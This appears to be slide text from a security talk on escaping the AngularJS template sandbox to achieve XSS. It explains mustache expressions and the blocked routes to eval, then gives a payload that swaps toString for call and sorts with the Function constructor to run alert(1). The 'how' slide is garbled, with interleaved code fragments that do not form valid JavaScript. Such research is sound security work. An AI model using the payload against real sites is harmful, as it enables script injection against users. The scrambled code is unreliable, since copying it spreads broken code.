2. What is AngularJS? And
where’s the sandbox?
• Javascript framework for building single page web
applications.
• Mustache style templates: Having <h1>{{1+2+3}}</h1>
anywhere in Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with Javascript
• Template expression Javascript is sandboxed - It can’t
reach [object Window] or DOM
• If we could access dangerous objects from templates, we
could XSS any AngularJS app that prints user data in
Angular bound HTML
3. Executing JS… From JS
• eval() - Unavailable under window
• document.write - Unavailable under document
• location=“javascript:” - Unavailable under
document
• Function(“code”)() - Unavailable under blacklist
• What else is there?
5. The how
if(if((toString.Function("compareFunction(function(constructor.a){a", alert("alert(1)}) 1)}).element1, 1)") prototype.== toString() == 1){
1){
element2) toString=
== 1..toString()){
== 1){
toString.//{{sort toString.element constructor.constructor.as bigger
prototype.prototype.call;
toString=
}else if((function(["if(… a","toString.alert(== a){0){
1)"].alert(constructor.sort(1)}).Function);
call() prototype.== 1..toString()){
call;
//sort element as same
}else{
//sort element as smaller
}
//sort element as bigger
}else if(… == 0){
//sort element as same
}else{
//sort element as smaller
}
toString.constructor);
[“a”,”alert(1)”].sort(toString.constructor)}}
alert(1)